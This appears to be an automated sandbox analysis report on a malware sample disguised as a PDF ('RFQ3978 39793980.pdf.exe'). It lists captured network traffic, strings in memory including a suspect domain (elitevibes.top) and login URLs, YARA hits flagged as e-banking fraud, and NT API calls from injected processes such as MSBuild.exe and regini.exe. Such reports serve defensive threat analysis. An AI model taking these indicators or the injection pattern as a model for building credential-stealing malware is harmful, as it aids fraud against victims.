                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Dec 2024 20:49:30 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a5f968-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Dec 2024 20:49:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 
27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Dec 2024 20:49:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Dec 2024 20:49:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Dec 2024 20:49:45 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:49:52 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div 
class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:49:54 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div 
class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:49:57 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div 
class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:50:00 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div 
class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: shazRxxmQwU.exe, 00000008.00000002.3560408446.0000000001287000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.elitevibes.top
                Source: shazRxxmQwU.exe, 00000008.00000002.3560408446.0000000001287000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.elitevibes.top/a5zo/
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081668749.0000000005184000.00000004.00000020.00020000.00000000.sdmp, RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: regini.exe, 00000007.00000002.3563226970.000000000762D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: regini.exe, 00000007.00000002.3563226970.000000000762D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: regini.exe, 00000007.00000002.3563226970.000000000762D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: regini.exe, 00000007.00000002.3563226970.000000000762D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: regini.exe, 00000007.00000002.3561717968.0000000003F2E000.00000004.10000000.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000008.00000002.3561378450.0000000003D3E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
                Source: regini.exe, 00000007.00000002.3561717968.0000000003F2E000.00000004.10000000.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000008.00000002.3561378450.0000000003D3E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
                Source: regini.exe, 00000007.00000002.3563226970.000000000762D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: regini.exe, 00000007.00000002.3563226970.000000000762D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: regini.exe, 00000007.00000002.3563226970.000000000762D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: regini.exe, 00000007.00000002.3560035805.0000000002820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: regini.exe, 00000007.00000002.3560035805.0000000002820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: regini.exe, 00000007.00000002.3560035805.00000000027CD000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3560035805.0000000002820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: regini.exe, 00000007.00000002.3560035805.0000000002820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: regini.exe, 00000007.00000002.3560035805.0000000002820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: regini.exe, 00000007.00000002.3560035805.0000000002820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: regini.exe, 00000007.00000002.3560035805.0000000002820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: regini.exe, 00000007.00000003.2537937044.00000000075E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: regini.exe, 00000007.00000002.3563226970.000000000762D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: regini.exe, 00000007.00000002.3563226970.000000000762D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443

                E-Banking Fraud

                Source: Yara matchFile source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.2352159406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3560935486.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3560872245.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2352816417.0000000000FD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3560408446.0000000001230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3561019858.00000000039F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2354528034.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: initial sampleStatic PE information: Filename: RFQ3978 39793980.pdf.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0042C843 NtClose,5_2_0042C843
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152B60 NtClose,LdrInitializeThunk,5_2_01152B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_01152DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_01152C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011535C0 NtCreateMutant,LdrInitializeThunk,5_2_011535C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01154340 NtSetContextThread,5_2_01154340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01154650 NtSuspendThread,5_2_01154650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152B80 NtQueryInformationFile,5_2_01152B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152BA0 NtEnumerateValueKey,5_2_01152BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152BF0 NtAllocateVirtualMemory,5_2_01152BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152BE0 NtQueryValueKey,5_2_01152BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152AB0 NtWaitForSingleObject,5_2_01152AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152AD0 NtReadFile,5_2_01152AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152AF0 NtWriteFile,5_2_01152AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152D10 NtMapViewOfSection,5_2_01152D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152D00 NtSetInformationFile,5_2_01152D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01152D30 NtUnmapViewOfSection,5_2_01152D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01152DB0 NtEnumerateKey,5_2_01152DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01152DD0 NtDelayExecution,5_2_01152DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01152C00 NtQueryInformationProcess,5_2_01152C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01152C60 NtCreateKey,5_2_01152C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01152CA0 NtQueryInformationToken,5_2_01152CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01152CC0 NtQueryVirtualMemory,5_2_01152CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01152CF0 NtOpenProcess,5_2_01152CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01152F30 NtCreateSection,5_2_01152F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01152F60 NtCreateProcessEx,5_2_01152F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01152F90 NtProtectVirtualMemory,5_2_01152F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01152FB0 NtResumeThread,5_2_01152FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01152FA0 NtQuerySection,5_2_01152FA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01152FE0 NtCreateFile,5_2_01152FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01152E30 NtWriteVirtualMemory,5_2_01152E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01152E80 NtReadVirtualMemory,5_2_01152E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01152EA0 NtAdjustPrivilegesToken,5_2_01152EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01152EE0 NtQueueApcThread,5_2_01152EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01153010 NtOpenDirectoryObject,5_2_01153010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01153090 NtSetValueKey,5_2_01153090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_011539B0 NtGetContextThread,5_2_011539B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01153D10 NtOpenProcessToken,5_2_01153D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01153D70 NtOpenThread,5_2_01153D70
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB4340 NtSetContextThread,LdrInitializeThunk,7_2_02DB4340
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB4650 NtSuspendThread,LdrInitializeThunk,7_2_02DB4650
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB2AD0 NtReadFile,LdrInitializeThunk,7_2_02DB2AD0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB2AF0 NtWriteFile,LdrInitializeThunk,7_2_02DB2AF0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_02DB2BF0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB2BE0 NtQueryValueKey,LdrInitializeThunk,7_2_02DB2BE0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB2BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_02DB2BA0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB2B60 NtClose,LdrInitializeThunk,7_2_02DB2B60
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB2EE0 NtQueueApcThread,LdrInitializeThunk,7_2_02DB2EE0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB2E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_02DB2E80
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB2FE0 NtCreateFile,LdrInitializeThunk,7_2_02DB2FE0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB2FB0 NtResumeThread,LdrInitializeThunk,7_2_02DB2FB0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB2F30 NtCreateSection,LdrInitializeThunk,7_2_02DB2F30
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB2CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_02DB2CA0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB2C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_02DB2C70
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB2C60 NtCreateKey,LdrInitializeThunk,7_2_02DB2C60
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB2DD0 NtDelayExecution,LdrInitializeThunk,7_2_02DB2DD0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB2DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_02DB2DF0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB2D10 NtMapViewOfSection,LdrInitializeThunk,7_2_02DB2D10
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB2D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_02DB2D30
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB35C0 NtCreateMutant,LdrInitializeThunk,7_2_02DB35C0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB39B0 NtGetContextThread,LdrInitializeThunk,7_2_02DB39B0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB2AB0 NtWaitForSingleObject,7_2_02DB2AB0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB2B80 NtQueryInformationFile,7_2_02DB2B80
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB2EA0 NtAdjustPrivilegesToken,7_2_02DB2EA0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB2E30 NtWriteVirtualMemory,7_2_02DB2E30
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB2F90 NtProtectVirtualMemory,7_2_02DB2F90
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB2FA0 NtQuerySection,7_2_02DB2FA0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB2F60 NtCreateProcessEx,7_2_02DB2F60
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB2CC0 NtQueryVirtualMemory,7_2_02DB2CC0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB2CF0 NtOpenProcess,7_2_02DB2CF0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB2C00 NtQueryInformationProcess,7_2_02DB2C00
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB2DB0 NtEnumerateKey,7_2_02DB2DB0
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB2D00 NtSetInformationFile,7_2_02DB2D00
                Source: C:\Windows\SysWOW64\regini.exe Code function: 7_2_02DB3090 NtSetValueKey,7_2_02DB3090
